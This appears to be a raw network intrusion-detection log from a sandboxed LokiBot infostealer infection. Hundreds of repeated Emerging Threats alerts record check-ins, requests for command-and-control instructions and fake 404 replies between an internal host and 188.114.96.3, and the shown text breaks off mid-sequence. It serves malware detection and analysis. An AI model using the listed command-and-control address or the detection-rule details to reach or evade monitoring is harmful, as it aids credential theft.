                  2024-09-25T15:29:52.541643+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455957188.114.96.380TCP
                  2024-09-25T15:29:53.229813+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455957188.114.96.380TCP
                  2024-09-25T15:29:53.229813+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455957188.114.96.380TCP
                  2024-09-25T15:29:53.234693+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455957TCP
                  2024-09-25T15:29:53.383135+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455958188.114.96.380TCP
                  2024-09-25T15:29:53.383135+02002025381ET MALWARE LokiBot Checkin1192.168.2.455958188.114.96.380TCP
                  2024-09-25T15:29:53.383135+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455958188.114.96.380TCP
                  2024-09-25T15:29:54.101488+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455958188.114.96.380TCP
                  2024-09-25T15:29:54.101488+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455958188.114.96.380TCP
                  2024-09-25T15:29:54.106348+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455958TCP
                  2024-09-25T15:29:54.258505+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455959188.114.96.380TCP
                  2024-09-25T15:29:54.258505+02002025381ET MALWARE LokiBot Checkin1192.168.2.455959188.114.96.380TCP
                  2024-09-25T15:29:54.258505+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455959188.114.96.380TCP
                  2024-09-25T15:29:54.972069+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455959188.114.96.380TCP
                  2024-09-25T15:29:54.972069+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455959188.114.96.380TCP
                  2024-09-25T15:29:54.976956+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455959TCP
                  2024-09-25T15:29:55.425796+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455960188.114.96.380TCP
                  2024-09-25T15:29:55.425796+02002025381ET MALWARE LokiBot Checkin1192.168.2.455960188.114.96.380TCP
                  2024-09-25T15:29:55.425796+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455960188.114.96.380TCP
                  2024-09-25T15:29:56.064141+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455960188.114.96.380TCP
                  2024-09-25T15:29:56.064141+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455960188.114.96.380TCP
                  2024-09-25T15:29:56.069027+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455960TCP
                  2024-09-25T15:29:56.224619+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455961188.114.96.380TCP
                  2024-09-25T15:29:56.224619+02002025381ET MALWARE LokiBot Checkin1192.168.2.455961188.114.96.380TCP
                  2024-09-25T15:29:56.224619+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455961188.114.96.380TCP
                  2024-09-25T15:29:56.901470+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455961188.114.96.380TCP
                  2024-09-25T15:29:56.901470+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455961188.114.96.380TCP
                  2024-09-25T15:29:56.906316+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455961TCP
                  2024-09-25T15:29:57.052272+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455962188.114.96.380TCP
                  2024-09-25T15:29:57.052272+02002025381ET MALWARE LokiBot Checkin1192.168.2.455962188.114.96.380TCP
                  2024-09-25T15:29:57.052272+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455962188.114.96.380TCP
                  2024-09-25T15:29:57.735297+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455962188.114.96.380TCP
                  2024-09-25T15:29:57.735297+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455962188.114.96.380TCP
                  2024-09-25T15:29:57.741467+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455962TCP
                  2024-09-25T15:29:58.164945+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455963188.114.96.380TCP
                  2024-09-25T15:29:58.164945+02002025381ET MALWARE LokiBot Checkin1192.168.2.455963188.114.96.380TCP
                  2024-09-25T15:29:58.164945+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455963188.114.96.380TCP
                  2024-09-25T15:29:58.842437+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455963188.114.96.380TCP
                  2024-09-25T15:29:58.842437+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455963188.114.96.380TCP
                  2024-09-25T15:29:58.847290+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455963TCP
                  2024-09-25T15:29:58.987927+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455964188.114.96.380TCP
                  2024-09-25T15:29:58.987927+02002025381ET MALWARE LokiBot Checkin1192.168.2.455964188.114.96.380TCP
                  2024-09-25T15:29:58.987927+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455964188.114.96.380TCP
                  2024-09-25T15:29:59.669969+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455964188.114.96.380TCP
                  2024-09-25T15:29:59.669969+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455964188.114.96.380TCP
                  2024-09-25T15:29:59.674829+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455964TCP
                  2024-09-25T15:29:59.835835+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455965188.114.96.380TCP
                  2024-09-25T15:29:59.835835+02002025381ET MALWARE LokiBot Checkin1192.168.2.455965188.114.96.380TCP
                  2024-09-25T15:29:59.835835+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455965188.114.96.380TCP
                  2024-09-25T15:30:00.558633+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455965188.114.96.380TCP
                  2024-09-25T15:30:00.558633+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455965188.114.96.380TCP
                  2024-09-25T15:30:00.564280+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455965TCP
                  2024-09-25T15:30:00.716018+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455966188.114.96.380TCP
                  2024-09-25T15:30:00.716018+02002025381ET MALWARE LokiBot Checkin1192.168.2.455966188.114.96.380TCP
                  2024-09-25T15:30:00.716018+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455966188.114.96.380TCP
                  2024-09-25T15:30:01.627418+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455966188.114.96.380TCP
                  2024-09-25T15:30:01.627418+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455966188.114.96.380TCP
                  2024-09-25T15:30:01.632246+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455966TCP
                  2024-09-25T15:30:01.920768+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455967188.114.96.380TCP
                  2024-09-25T15:30:01.920768+02002025381ET MALWARE LokiBot Checkin1192.168.2.455967188.114.96.380TCP
                  2024-09-25T15:30:01.920768+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455967188.114.96.380TCP
                  2024-09-25T15:30:02.596189+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455967188.114.96.380TCP
                  2024-09-25T15:30:02.596189+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455967188.114.96.380TCP
                  2024-09-25T15:30:02.601054+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455967TCP
                  2024-09-25T15:30:02.761283+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455968188.114.96.380TCP
                  2024-09-25T15:30:02.761283+02002025381ET MALWARE LokiBot Checkin1192.168.2.455968188.114.96.380TCP
                  2024-09-25T15:30:02.761283+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455968188.114.96.380TCP
                  2024-09-25T15:30:03.523662+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455968188.114.96.380TCP
                  2024-09-25T15:30:03.523662+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455968188.114.96.380TCP
                  2024-09-25T15:30:03.528472+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455968TCP
                  2024-09-25T15:30:03.946516+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455969188.114.96.380TCP
                  2024-09-25T15:30:03.946516+02002025381ET MALWARE LokiBot Checkin1192.168.2.455969188.114.96.380TCP
                  2024-09-25T15:30:03.946516+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455969188.114.96.380TCP
                  2024-09-25T15:30:05.068828+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455969188.114.96.380TCP
                  2024-09-25T15:30:05.068828+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455969188.114.96.380TCP
                  2024-09-25T15:30:05.073629+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455969TCP
                  2024-09-25T15:30:05.226430+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455970188.114.96.380TCP
                  2024-09-25T15:30:05.226430+02002025381ET MALWARE LokiBot Checkin1192.168.2.455970188.114.96.380TCP
                  2024-09-25T15:30:05.226430+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455970188.114.96.380TCP
                  2024-09-25T15:30:06.054434+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455970188.114.96.380TCP
                  2024-09-25T15:30:06.054434+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455970188.114.96.380TCP
                  2024-09-25T15:30:06.059293+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455970TCP
                  2024-09-25T15:30:06.440249+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455971188.114.96.380TCP
                  2024-09-25T15:30:06.440249+02002025381ET MALWARE LokiBot Checkin1192.168.2.455971188.114.96.380TCP
                  2024-09-25T15:30:06.440249+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455971188.114.96.380TCP
                  2024-09-25T15:30:07.461247+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455971188.114.96.380TCP
                  2024-09-25T15:30:07.461247+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455971188.114.96.380TCP
                  2024-09-25T15:30:07.466088+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455971TCP
                  2024-09-25T15:30:07.613698+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455972188.114.96.380TCP
                  2024-09-25T15:30:07.613698+02002025381ET MALWARE LokiBot Checkin1192.168.2.455972188.114.96.380TCP
                  2024-09-25T15:30:07.613698+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455972188.114.96.380TCP
                  2024-09-25T15:30:08.370283+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455972188.114.96.380TCP
                  2024-09-25T15:30:08.370283+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455972188.114.96.380TCP
                  2024-09-25T15:30:08.379045+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455972TCP
                  2024-09-25T15:30:08.520224+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455973188.114.96.380TCP
                  2024-09-25T15:30:08.520224+02002025381ET MALWARE LokiBot Checkin1192.168.2.455973188.114.96.380TCP
                  2024-09-25T15:30:08.520224+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455973188.114.96.380TCP
                  2024-09-25T15:30:09.181372+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455973188.114.96.380TCP
                  2024-09-25T15:30:09.181372+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455973188.114.96.380TCP
                  2024-09-25T15:30:09.189852+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455973TCP
                  2024-09-25T15:30:09.339418+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455974188.114.96.380TCP
                  2024-09-25T15:30:09.339418+02002025381ET MALWARE LokiBot Checkin1192.168.2.455974188.114.96.380TCP
                  2024-09-25T15:30:09.339418+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455974188.114.96.380TCP
                  2024-09-25T15:30:10.051609+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455974188.114.96.380TCP
                  2024-09-25T15:30:10.051609+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455974188.114.96.380TCP
                  2024-09-25T15:30:10.056504+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455974TCP
                  2024-09-25T15:30:10.220925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455975188.114.96.380TCP
                  2024-09-25T15:30:10.220925+02002025381ET MALWARE LokiBot Checkin1192.168.2.455975188.114.96.380TCP
                  2024-09-25T15:30:10.220925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455975188.114.96.380TCP
                  2024-09-25T15:30:10.861804+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455975188.114.96.380TCP
                  2024-09-25T15:30:10.861804+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455975188.114.96.380TCP
                  2024-09-25T15:30:10.866580+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455975TCP
                  2024-09-25T15:30:11.026164+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455976188.114.96.380TCP
                  2024-09-25T15:30:11.026164+02002025381ET MALWARE LokiBot Checkin1192.168.2.455976188.114.96.380TCP
                  2024-09-25T15:30:11.026164+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455976188.114.96.380TCP
                  2024-09-25T15:30:12.048794+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455976188.114.96.380TCP
                  2024-09-25T15:30:12.048794+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455976188.114.96.380TCP
                  2024-09-25T15:30:12.057825+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455976TCP
                  2024-09-25T15:30:12.218161+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455977188.114.96.380TCP
                  2024-09-25T15:30:12.218161+02002025381ET MALWARE LokiBot Checkin1192.168.2.455977188.114.96.380TCP
                  2024-09-25T15:30:12.218161+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455977188.114.96.380TCP
                  2024-09-25T15:30:12.921894+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455977188.114.96.380TCP
                  2024-09-25T15:30:12.921894+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455977188.114.96.380TCP
                  2024-09-25T15:30:12.928806+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455977TCP
                  2024-09-25T15:30:13.173782+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455978188.114.96.380TCP
                  2024-09-25T15:30:13.173782+02002025381ET MALWARE LokiBot Checkin1192.168.2.455978188.114.96.380TCP
                  2024-09-25T15:30:13.173782+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455978188.114.96.380TCP
                  2024-09-25T15:30:13.839050+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455978188.114.96.380TCP
                  2024-09-25T15:30:13.839050+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455978188.114.96.380TCP
                  2024-09-25T15:30:13.843863+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455978TCP
                  2024-09-25T15:30:13.993423+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455979188.114.96.380TCP
                  2024-09-25T15:30:13.993423+02002025381ET MALWARE LokiBot Checkin1192.168.2.455979188.114.96.380TCP
                  2024-09-25T15:30:13.993423+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455979188.114.96.380TCP
                  2024-09-25T15:30:14.665373+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455979188.114.96.380TCP
                  2024-09-25T15:30:14.665373+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455979188.114.96.380TCP
                  2024-09-25T15:30:14.670223+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455979TCP
                  2024-09-25T15:30:14.842547+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455980188.114.96.380TCP
                  2024-09-25T15:30:14.842547+02002025381ET MALWARE LokiBot Checkin1192.168.2.455980188.114.96.380TCP
                  2024-09-25T15:30:14.842547+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455980188.114.96.380TCP
                  2024-09-25T15:30:15.525637+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455980188.114.96.380TCP
                  2024-09-25T15:30:15.525637+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455980188.114.96.380TCP
                  2024-09-25T15:30:15.531017+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455980TCP
                  2024-09-25T15:30:15.691270+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455981188.114.96.380TCP
                  2024-09-25T15:30:15.691270+02002025381ET MALWARE LokiBot Checkin1192.168.2.455981188.114.96.380TCP
                  2024-09-25T15:30:15.691270+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455981188.114.96.380TCP
                  2024-09-25T15:30:16.351549+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455981188.114.96.380TCP
                  2024-09-25T15:30:16.351549+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455981188.114.96.380TCP
                  2024-09-25T15:30:16.357320+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455981TCP
                  2024-09-25T15:30:16.551798+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455982188.114.96.380TCP
                  2024-09-25T15:30:16.551798+02002025381ET MALWARE LokiBot Checkin1192.168.2.455982188.114.96.380TCP
                  2024-09-25T15:30:16.551798+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455982188.114.96.380TCP
                  2024-09-25T15:30:17.330144+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455982188.114.96.380TCP
                  2024-09-25T15:30:17.330144+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455982188.114.96.380TCP
                  2024-09-25T15:30:17.335069+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455982TCP
                  2024-09-25T15:30:17.497860+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455983188.114.96.380TCP
                  2024-09-25T15:30:17.497860+02002025381ET MALWARE LokiBot Checkin1192.168.2.455983188.114.96.380TCP
                  2024-09-25T15:30:17.497860+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455983188.114.96.380TCP
                  2024-09-25T15:30:18.191485+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455983188.114.96.380TCP
                  2024-09-25T15:30:18.191485+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455983188.114.96.380TCP
                  2024-09-25T15:30:18.196346+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455983TCP
                  2024-09-25T15:30:18.363198+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455984188.114.96.380TCP
                  2024-09-25T15:30:18.363198+02002025381ET MALWARE LokiBot Checkin1192.168.2.455984188.114.96.380TCP
                  2024-09-25T15:30:18.363198+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455984188.114.96.380TCP
                  2024-09-25T15:30:19.039902+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455984188.114.96.380TCP
                  2024-09-25T15:30:19.039902+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455984188.114.96.380TCP
                  2024-09-25T15:30:19.044870+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455984TCP
                  2024-09-25T15:30:19.199856+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455985188.114.96.380TCP
                  2024-09-25T15:30:19.199856+02002025381ET MALWARE LokiBot Checkin1192.168.2.455985188.114.96.380TCP
                  2024-09-25T15:30:19.199856+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455985188.114.96.380TCP
                  2024-09-25T15:30:19.925798+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455985188.114.96.380TCP
                  2024-09-25T15:30:19.925798+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455985188.114.96.380TCP
                  2024-09-25T15:30:19.932506+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455985TCP
                  2024-09-25T15:30:20.095708+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455986188.114.96.380TCP
                  2024-09-25T15:30:20.095708+02002025381ET MALWARE LokiBot Checkin1192.168.2.455986188.114.96.380TCP
                  2024-09-25T15:30:20.095708+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455986188.114.96.380TCP
                  2024-09-25T15:30:21.355002+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455986188.114.96.380TCP
                  2024-09-25T15:30:21.355002+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455986188.114.96.380TCP
                  2024-09-25T15:30:21.361415+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455986TCP
                  2024-09-25T15:30:21.507011+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455987188.114.96.380TCP
                  2024-09-25T15:30:21.507011+02002025381ET MALWARE LokiBot Checkin1192.168.2.455987188.114.96.380TCP
                  2024-09-25T15:30:21.507011+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455987188.114.96.380TCP
                  2024-09-25T15:30:22.975845+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455987188.114.96.380TCP
                  2024-09-25T15:30:22.975845+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455987188.114.96.380TCP
                  2024-09-25T15:30:22.977810+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455987TCP
                  2024-09-25T15:30:23.134473+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455988188.114.96.380TCP
                  2024-09-25T15:30:23.134473+02002025381ET MALWARE LokiBot Checkin1192.168.2.455988188.114.96.380TCP
                  2024-09-25T15:30:23.134473+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455988188.114.96.380TCP
                  2024-09-25T15:30:24.171451+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455988188.114.96.380TCP
                  2024-09-25T15:30:24.171451+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455988188.114.96.380TCP
                  2024-09-25T15:30:24.173330+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455988TCP
                  2024-09-25T15:30:24.350366+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455989188.114.96.380TCP
                  2024-09-25T15:30:24.350366+02002025381ET MALWARE LokiBot Checkin1192.168.2.455989188.114.96.380TCP
                  2024-09-25T15:30:24.350366+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455989188.114.96.380TCP
                  2024-09-25T15:30:25.134380+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455989188.114.96.380TCP
                  2024-09-25T15:30:25.134380+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455989188.114.96.380TCP
                  2024-09-25T15:30:25.139379+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455989TCP
                  2024-09-25T15:30:25.290428+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455990188.114.96.380TCP
                  2024-09-25T15:30:25.290428+02002025381ET MALWARE LokiBot Checkin1192.168.2.455990188.114.96.380TCP
                  2024-09-25T15:30:25.290428+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455990188.114.96.380TCP
                  2024-09-25T15:30:26.009752+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455990188.114.96.380TCP
                  2024-09-25T15:30:26.009752+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455990188.114.96.380TCP
                  2024-09-25T15:30:26.014599+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455990TCP
                  2024-09-25T15:30:26.169979+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455991188.114.96.380TCP
                  2024-09-25T15:30:26.169979+02002025381ET MALWARE LokiBot Checkin1192.168.2.455991188.114.96.380TCP
                  2024-09-25T15:30:26.169979+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455991188.114.96.380TCP
                  2024-09-25T15:30:26.831403+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455991188.114.96.380TCP
                  2024-09-25T15:30:26.831403+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455991188.114.96.380TCP
                  2024-09-25T15:30:26.836287+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455991TCP
                  2024-09-25T15:30:27.001129+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455992188.114.96.380TCP
                  2024-09-25T15:30:27.001129+02002025381ET MALWARE LokiBot Checkin1192.168.2.455992188.114.96.380TCP
                  2024-09-25T15:30:27.001129+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455992188.114.96.380TCP
                  2024-09-25T15:30:27.738071+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455992188.114.96.380TCP
                  2024-09-25T15:30:27.738071+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455992188.114.96.380TCP
                  2024-09-25T15:30:27.742915+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455992TCP
                  2024-09-25T15:30:27.899264+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455993188.114.96.380TCP
                  2024-09-25T15:30:27.899264+02002025381ET MALWARE LokiBot Checkin1192.168.2.455993188.114.96.380TCP
                  2024-09-25T15:30:27.899264+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455993188.114.96.380TCP
                  2024-09-25T15:30:28.608409+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455993188.114.96.380TCP
                  2024-09-25T15:30:28.608409+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455993188.114.96.380TCP
                  2024-09-25T15:30:28.613288+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455993TCP
                  2024-09-25T15:30:28.753857+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455994188.114.96.380TCP
                  2024-09-25T15:30:28.753857+02002025381ET MALWARE LokiBot Checkin1192.168.2.455994188.114.96.380TCP
                  2024-09-25T15:30:28.753857+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455994188.114.96.380TCP
                  2024-09-25T15:30:29.440258+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455994188.114.96.380TCP
                  2024-09-25T15:30:29.440258+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455994188.114.96.380TCP
                  2024-09-25T15:30:29.447188+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455994TCP
                  2024-09-25T15:30:29.618078+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455995188.114.96.380TCP
                  2024-09-25T15:30:29.618078+02002025381ET MALWARE LokiBot Checkin1192.168.2.455995188.114.96.380TCP
                  2024-09-25T15:30:29.618078+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455995188.114.96.380TCP
                  2024-09-25T15:30:30.271298+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455995188.114.96.380TCP
                  2024-09-25T15:30:30.271298+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455995188.114.96.380TCP
                  2024-09-25T15:30:30.276618+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455995TCP
                  2024-09-25T15:30:30.428677+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455996188.114.96.380TCP
